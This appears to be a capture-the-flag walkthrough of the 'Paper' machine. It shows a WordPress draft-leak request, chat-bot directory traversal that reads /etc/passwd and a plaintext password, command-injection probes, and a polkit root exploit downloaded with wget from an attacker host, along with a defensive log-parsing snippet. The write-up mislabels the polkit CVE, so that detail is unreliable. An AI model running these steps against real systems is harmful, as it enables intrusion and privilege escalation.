┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.143
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 5.1 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.143
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
nmap finds three open TCP ports, SSH (22), HTTP (80), and HTTPS (443):
Based on the Apache version, the host is likely running CentOS 8. There’s a TLS certificate, but it just has localhost.localdomain, which isn’t interesting. The HTTP port and the HTTPS port seem to be serving the same thing.
Enumeration: HTTPS
Enumeration: HTTP
WAP:
Web servers
Apache HTTP Server 2.4.37
Operating systems
CentOS
Web server extensions
OpenSSL 1.1.1k
SOURCE CODE:
view-source:http://10.10.11.143/
BURP:
Surprisingly, the default page doesn’t load as index.html on either port. One interesting note is that the default page is coming back with an HTTP 403 Forbidden response (and not a 200 OK). Not sure that means anything, but interesting.
Subdomain Fuzz:
Knowing that there are different DNS names in use, I’ll fuzz for subdomains using wfuzz. I’ll start this without any filtering, and see that the default case is 199691 characters. I’ll kill it, and restart with --hh 199691. It finds one additional subdomain:
The HTTPS site for office.paper returns the same default page. But the HTTP site has a new page for a paper company, Blunder Tiffin:
This is clearly a play on the company from the TV show “The Office”, which focuses on a paper company called Dunder Mifflin.
There are three posts, all by Prisonmike, and all written in a character similar to the dumb boss from the TV show. One comment on one of the posts has a hint:
I’ll make sure to check out draft posts if I can find access.
Hey-o, everyone out there in SyberWorld. It's old Creed Bratton coming at you again, here from my perch as a Quality Assurance Manager at Blunder Tiffin paper. Just a few observations on the world around me.
What do you guys think is the best kind of car? To me, you can't beat motorcycles. They’re small and dangerous. They just can’t be trusted.
wpscan
I’ll run wpscan to identify WordPress issues using wpscan --url http://office.paper --api-token $WPSCAN_API. To scan for vulnerabilities, I need to use an API token, which I got for free at the wpscan site. I store my API token in the Bash environment variable $WPSCAN_API with this line in my ~/.bashrc file:
wpscan finds the WP version is 5.2.3:
There are 32 known vulnerabilities in this version, but one towards the top jumps out given the mention of drafts earlier:
This site is an instance of rocket.chat, an open source communications platform:
Under the login button there’s a custom bit of text that says the registration URL is hidden. I’ll try some basic credential guessing, but nothing logs in. I don’t see any interesting vulnerabilities in rocket.chat.
Shell as dwight
Access rocket.chat
CVE-2019-17671
This post breaks down how vulnerable WordPress versions could be exploited via CVE-2019-17671 to view draft, password protected, and private posts. It’s a mistake in how WordPress handles displaying a mix of draft and published posts when viewed with ?static=1. If the first post returned is public, then all the posts will be dumped to the page. There are ways to reorder the result, but here it just works without any additional tricks by visiting:
http://office.paper/?static=1
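From the defender's side, the trigger for this bug is a request whose query string sets static=1, which leaves a clear mark in the web server log. This added example (my code, not from the writeup or from WordPress) parses constructed Apache combined-format log lines and returns the requests that carry that parameter, keeping the client, status and response size so they can be correlated with the site's WordPress version.

```javascript
// Added example: flag CVE-2019-17671 probing (?static=1) in Apache access logs.
// The log lines below are constructed for the example; 10.10.16.16 is the
// attacking VM in the writeup, 10.10.14.3 is a made-up second client.
const SAMPLE_LOG = [
  '10.10.16.16 - - [23/Jan/2024:08:05:01 -0500] "GET / HTTP/1.1" 200 7543 "-" "Mozilla/5.0"',
  '10.10.16.16 - - [23/Jan/2024:08:05:09 -0500] "GET /?static=1 HTTP/1.1" 200 14612 "-" "Mozilla/5.0"',
  '10.10.16.16 - - [23/Jan/2024:08:05:12 -0500] "GET /?static=1&order=asc HTTP/1.1" 200 14612 "-" "curl/7.74.0"',
  '10.10.14.3 - - [23/Jan/2024:08:06:00 -0500] "GET /wp-login.php HTTP/1.1" 200 2301 "-" "Mozilla/5.0"',
  '10.10.14.3 - - [23/Jan/2024:08:06:30 -0500] "GET /assets/static=1.css HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
];

// Combined log format: client ident user [time] "METHOD target proto" status bytes ...
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // not a combined-format line; skip rather than guess
  return {
    ip: m[1],
    time: m[2],
    method: m[3],
    target: m[4],
    status: Number(m[5]),
    bytes: m[6] === "-" ? 0 : Number(m[6]),
  };
}

// True only when the query string sets static=1; "static=1" appearing in
// the path (e.g. a CSS file name) is not the WordPress trigger.
function isStaticProbe(target) {
  const q = target.indexOf("?");
  if (q < 0) return false;
  return new URLSearchParams(target.slice(q + 1)).get("static") === "1";
}

// Return every GET that carries the trigger, with the fields an analyst
// needs: who sent it, when, and whether the server answered with content.
function findProbes(lines) {
  const hits = [];
  for (const line of lines) {
    const r = parseLine(line);
    if (r && r.method === "GET" && isStaticProbe(r.target)) {
      hits.push({ ip: r.ip, time: r.time, target: r.target, status: r.status, bytes: r.bytes });
    }
  }
  return hits;
}
```

A 200 on such a request with a body noticeably larger than the normal front page is the case worth escalating, since that is what a successful draft dump looks like.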
Secret Registration URL of new Employee chat system
There is a private link to access rocket chat registration.
Register for Chat:
At that link, it provides a registration form:
exodus
info@x.com
password123
The next page asks me to pick a username:
exodus
And on clicking “Use this username” I’m in the chat:
recyclops:
Discover
The #general channel has a bunch of characters from the TV show, and some good jokes, but also a bit about Dwight programming a bot:
recyclops help
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
We can also send Direct Messages to recyclops!
The most interesting points:
recyclops help will show the commands
recyclops can get files and list files
this channel is read only
recyclops can be reached by DM (direct message).
Listing Files
I’ll open a DM to recyclops, and try to list files:
It shows the contents of /sales/. If I give it a valid directory, it returns the contents of that directory. But if I give it an invalid path, it errors, and gives the full path:
list
Bot
8:03 AM
Fetching the directory listing of /sales/
total 0
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 .
drwx------ 11 dwight dwight 281 Feb 6 2022 ..
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 sale
drwxr-xr-x 2 dwight dwight 27 Jul 3 2021 sale_2
8:03 AM
list sale
Bot
8:03 AM
Fetching the directory listing of sale
total 4
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 .
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 ..
-rw-r--r-- 1 dwight dwight 158 Sep 15 2021 portfolio.txt
This command is vulnerable to directory traversal:
list ../../..
Bot
8:04 AM
Fetching the directory listing of ../../..
total 28
dr-xr-xr-x. 17 root root 244 Jan 17 2022 .
dr-xr-xr-x. 17 root root 244 Jan 17 2022 ..
-rw-r--r-- 1 root root 0 Jan 14 2022 .autorelabel
lrwxrwxrwx 1 root root 7 Jun 22 2021 bin -> usr/bin
dr-xr-xr-x. 4 root root 4096 Jan 14 2022 boot
drwxr-xr-x 20 root root 3020 Jan 23 05:25 dev
drwxr-xr-x. 145 root root 8192 Jan 23 05:25 etc
drwxr-xr-x. 3 root root 20 Jan 14 2022 home
lrwxrwxrwx 1 root root 7 Jun 22 2021 lib -> usr/lib
lrwxrwxrwx. 1 root root 9 Jun 22 2021 lib64 -> usr/lib64
drwxr-xr-x. 2 root root 6 Jun 22 2021 media
drwxr-xr-x. 3 root root 18 Jun 22 2021 mnt
drwxr-xr-x. 3 root root 25 Jun 22 2021 opt
dr-xr-xr-x 264 root root 0 Jan 23 05:25 proc
dr-xr-x---. 8 root root 4096 Jan 23 05:25 root
drwxr-xr-x 44 root root 1200 Jan 23 05:35 run
lrwxrwxrwx 1 root root 8 Jun 22 2021 sbin -> usr/sbin
drwxr-xr-x. 2 root root 6 Jun 22 2021 srv
dr-xr-xr-x 13 root root 0 Jan 23 05:25 sys
drwxrwxrwt. 10 root root 4096 Jan 23 06:54 tmp
drwxr-xr-x. 13 root root 158 Jan 14 2022 usr
drwxr-xr-x. 22 root root 4096 Jan 14 2022 var
It seems hardened against command injection:
list ../;id
list $(id)
list && id
list || id
Read Files:
The bot can show file content:
file sale/portfolio.txt
Bot
8:10 AM
<!=====Contents of file sale/portfolio.txt=====>
Portfolio
----------
- Bill
- Served the country in war
- Family built the country
- purchased paper worth a million dollars
- will probably fire me.
<!=====End of file sale/portfolio.txt=====>
The directory traversal vulnerability is present in this command as well. file ../../../etc/passwd shows the contents of that file:
file ../../../etc/passwd
Bot
8:07 AM
<!=====Contents of file ../../../etc/passwd=====>
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
<!=====End of file ../../../etc/passwd=====>
root:x:0:0:root:/root:/bin/bash
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
I’ll note that dwight and rocketchat are the only users on the box not in the system/service range below 1000.
Leak Credentials:
In ../hubot there’s a NodeJS project:
The .env file is immediately interesting, as those files tend to hold secrets for the project:
file ../hubot/.env
Bot
8:16 AM
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>
SSH:
Given the access to files in /home/dwight, it makes sense that the bot is running as dwight. It’s worth checking if dwight shared their password across rocketchat and the system. crackmapexec shows it works:
Note: It’s important to put that password in single quotes and not double quotes, or Bash will interpret !23 as the command run 23 commands ago in the current session’s history.
LinPEAS:
In general, I like to enumerate manually before breaking out enumeration scripts, because it provides good practice in knowing what to look for. That said, on this one, after looking around on my own, I didn’t see much of interest.
Build
I could grab the latest release from the releases page, but there’s also a builder I can use. I’ll clone the repo onto my computer (git clone https://github.com/carlospolop/PEASS-ng), and then go into the PEASS-ng/linPEAS directory.
From there, I’ll call the builder script with python3 -m builder.linpeas_builder. This is going to run linpeas_builder from the builder directory, which builds a .sh script:
Polkit CVE:
CVE-2021-3650 is a vulnerability in polkit discovered by Kevin Backhouse of the GitHub Security Lab. This is a timing attack against polkit: by killing the process at the right time, it ends up skipping the authentication and allows actions such as creating an account with sudo privs and setting its password.
The author of Paper happens to have a script for this exploit on their GitHub. I’ll save a copy on my VM, and start a webserver in that directory (python3 -m http.server 80). Then I’ll fetch the script with wget to Paper:
┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 80
[dwight@paper ~]$ wget 10.10.16.16/poc.sh
--2024-01-23 08:32:15-- http://10.10.16.16/poc.sh
Connecting to 10.10.16.16:80... connected.
HTTP request sent, awaiting response...
200 OK
poc.sh 100%[===============================>] 9.40K --.-KB/s in 0.04s
Now I just run it:
[dwight@paper ~]$ bash poc.sh
[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
It might not work every time, but running it repeatedly will eventually work. I’ll change user to the secnigma user with the password secnigmaftw (from the README.md on GitHub):
[dwight@paper ~]$ su secnigma
Password: secnigmaftw
[dwight@paper ~]$ sudo bash
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for dwight: Queenofblad3s!23
dwight is not in the sudoers file. This incident will be reported.
Now this user is in the wheel group:
[secnigma@paper ~]$ id
uid=1005 gid=1005 groups=1005,10(wheel)
This group allows members to run sudo. I’ll need the password again, but it works:
[dwight@paper tmp]$ su - secnigma
[dwight@paper tmp]$ bash poc.sh
[dwight@paper tmp]$ su - secnigma
Password: secnigmaftw
[secnigma@paper ~]$ sudo su -
[sudo] password for secnigma: secnigmaftw
[root@paper ~]# cat /root/root.txt
97286------------------------------